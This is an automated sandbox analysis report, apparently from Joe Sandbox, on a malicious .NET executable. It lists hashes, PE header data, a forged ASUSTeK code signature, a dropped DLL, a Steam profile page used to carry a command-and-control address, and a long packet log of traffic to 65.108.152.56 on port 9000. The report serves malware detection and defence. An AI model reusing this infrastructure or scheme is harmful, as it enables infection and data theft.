                                                                                                                                                                                              SHA-512:3CCFEF284D9A104BCC00BDE50CAC1DE5578281BFF2F8DA1872AC722E128C5814CD4B77438BB80577E825BE077A8426FB2629995D905C5D03847E56D0ECC01C59
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: p__o https://65.108.152.56:9000|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/global
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2459136
                                                                                                                                                                                              Entropy (8bit):6.052474106868353
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                              MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                              SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                              SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                              SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: tZvjMg3Hw9.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: WlCIinu0yp.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: 0dN59ZIkEM.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                              Entropy (8bit):7.414407050048219
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                              File size:358'000 bytes
                                                                                                                                                                                              MD5:b9773393891d9cc471cd58cac09052dd
                                                                                                                                                                                              SHA1:784a14954c7abca7d7e2e92c60b93557238426f4
                                                                                                                                                                                              SHA256:0a8357cb9a1d348d1c4b4ec101f2328fd43f976803bcc360525ced55fbb9aeaf
                                                                                                                                                                                              SHA512:72a669e736ecfc5422a07542e15cad7d82b9ae41591f4c375e31fa4dc2d70f620b44ff19b5b6d0928aac3cf244a3143af433d47eeaa3c5c6b9968cf71d1e6848
                                                                                                                                                                                              SSDEEP:6144:Dqv0Ib3JJzx1MfjF+N33l3+YBVYjZ7eZH9PJWweK/ojy8Kkc2ivFt+0P:Gb3TEbF+13NPYd6B9lcdFBsPP
                                                                                                                                                                                              TLSH:B1749FD48267CF37D3ED0778F095120593FD820B8893FB4A6A2416A1590A3E2F7566FB
                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.8f.................F...........d... ........@.. ....................................`................................
                                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                                              Entrypoint:0x4564de
                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                              Time Stamp:0x6638D46F [Mon May 6 13:00:31 2024 UTC]
                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                              Signature Issuer:CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                              Error Number:-2146869232
Not Before:08/10/2020 01:00:00
Not After:12/10/2023 13:00:00
                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                              • CN=ASUSTeK COMPUTER INC., O=ASUSTeK COMPUTER INC., L=Beitou District, S=Taipei City, C=TW, SERIALNUMBER=23638777, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=TW
                                                                                                                                                                                              Version:3
                                                                                                                                                                                              Thumbprint MD5:332CDC164B1324C3FF3F64E228C5FFFC
                                                                                                                                                                                              Thumbprint SHA-1:CBFB3D25134A5FF6FCF2924D5B4BE16194EA7E13
                                                                                                                                                                                              Thumbprint SHA-256:531855F05B9D55E4F6DDEBC443706382DDB9ACBD2B8AB24004822BE204420943
                                                                                                                                                                                              Serial:0C9838F673F9B1CCE395CFAB2B6684E4
                                                                                                                                                                                              Instruction
                                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x56490 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x58000 | 0x53c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x55000 | 0x2670
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x56447 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x544e4 | 0x54600 | cd200369f3723ebffd9769e4598cb5e7 | False | 0.7394241898148148 | data | 7.421157543801175 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x58000 | 0x53c | 0x600 | b3903f7a2f10b94867e427ae266651a6 | False | 0.390625 | data | 3.9246143706878946 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x5a000 | 0xc | 0x200 | fb9aeb40bfad98519cace1adb7b9f6da | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x580a0 | 0x2b0 | data | | | 0.4375
RT_MANIFEST | 0x58350 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                              May 7, 2024 05:29:00.712208033 CEST90004973665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:00.712281942 CEST497369000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.716850996 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:00.717017889 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.717437983 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.902920961 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:00.903085947 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:00.903146982 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.903420925 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.905021906 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.090579033 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091330051 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091382980 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091391087 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091396093 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091428995 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091442108 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091463089 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091506004 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091521978 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091538906 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091551065 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091574907 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091583014 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091604948 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091607094 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091619015 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091624975 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091645956 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091655016 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.104315996 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.104379892 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.276869059 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.276885986 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.276946068 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.283539057 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.283572912 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.283627033 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.296478987 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.296493053 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.296555996 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.309021950 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.309036016 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.309082985 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.321839094 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.321851969 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.321888924 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.321928024 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.334321022 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.334335089 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.334389925 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.346983910 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.347050905 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.347132921 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.347178936 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.359678030 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.359731913 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.359837055 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.359879971 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.372373104 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.372386932 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.372442007 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.384990931 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.385004044 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.385070086 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.397798061 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.397813082 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.397876024 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.462589979 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.462658882 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.462744951 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.462795973 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.468288898 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.468302965 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.468358040 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.478765011 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.478779078 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.478821993 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.489640951 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.489670038 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.489713907 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.500611067 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.500623941 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.500674009 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.511364937 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.511378050 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.511419058 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.522116899 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.522130966 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.522169113 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.532936096 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.532949924 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.532984018 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.543874979 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.543889999 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.543929100 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.554639101 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.554653883 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.554697037 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.565445900 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.565499067 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.565577030 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.565625906 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.575885057 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.575902939 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.575932026 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.575956106 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.585697889 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.814971924 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.815006971 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.819561005 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.819580078 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.819606066 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.819628000 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.824151039 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.824198961 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.824213028 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.824251890 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.828758955 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.828804970 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.828816891 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.828840971 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.833302021 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.833353043 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.833353996 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.833390951 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.837694883 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.837708950 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.837743998 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.841216087 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.841228008 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.841262102 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.844769955 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.844784021 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.844815016 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.844832897 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.848119974 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.848133087 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.848166943 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.851648092 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.851681948 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.851696968 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.851722002 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.854979038 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.854993105 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.855029106 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.858226061 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.858268023 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.858278036 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.858304024 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.861619949 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.861633062 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.861669064 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.861716986 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.864840031 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.864855051 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.864893913 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.868060112 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.868074894 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.868123055 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.871269941 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.871284962 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.871318102 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.874330997 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.874344110 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.874387026 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.874404907 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.877403975 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.877417088 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.877450943 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.880454063 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.880477905 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.880500078 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.880520105 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.883511066 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.883544922 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.883558035 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.883579016 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.886563063 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.886576891 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.886612892 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.886630058 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.889430046 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.889442921 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.889477968 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.892321110 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.892333984 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.892364025 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.895308018 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.895322084 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.895366907 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.898139000 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.898153067 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.898190975 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.900937080 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.900971889 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.900995970 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.901019096 CEST497389000192.168.2.465.108.152.56
